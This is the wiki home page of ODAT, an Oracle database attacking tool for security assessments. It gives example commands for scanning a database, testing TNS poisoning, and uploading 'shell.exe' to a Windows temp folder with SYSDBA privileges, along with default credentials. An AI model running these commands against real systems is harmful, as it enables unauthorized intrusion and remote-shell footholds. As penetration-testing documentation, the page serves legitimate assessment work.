-
Notifications
You must be signed in to change notification settings - Fork 345
Home
This wiki explains how to use ODAT (Oracle Database Attacking Tool) during security assessments.
Explanations and examples are organized by ODAT module in this Wiki (see on the right).
The -h option can be used to get the ODAT help menu:
./odat.py -h
The all module is the first module that should be used when you meet an Oracle Database. For example, you can use this command for starting:
./odat.py all -s 192.168.1.254 -p 1521
You can give the SID if you know it:
./odat.py all -s 192.168.1.254 -p 1521 -d ORCL
If you know a valid account, you can give it to this module:
./odat.py all -s 192.168.1.254 -p 1521 -d ORCL -U SYS -P password
See all for more details about this module.
For each module (i.e. sidguesser), you can use -v, -vv or -vvv for enabling verbosity and understanding how or what the module is doing. For example:
./odat.py all -s 192.168.1.254 -vvv
Before to use a specific command of a module, the --test-module should be used first for knowing if you can use it (target is vulnerable, Oracle account has enough privileges, etc). For example:
./odat.py tnspoison -s 192.168.1.254 -p 1521 -d ORCL --test-module
The --sysdba flag can be used to perform an action using DBA privileges, if your user account has them.
./odat.py utlfile -s 192.168.1.254 -p 1521 -d ORCL -U scott -P tiger --sysdba --putFile 'C:/windows/temp/' shell.exe shell.exe
This can be useful if you get the error 'ORA-01031: insufficient privileges' when your user should be able to perform an action
Quentin HARDY: [email protected] or [email protected]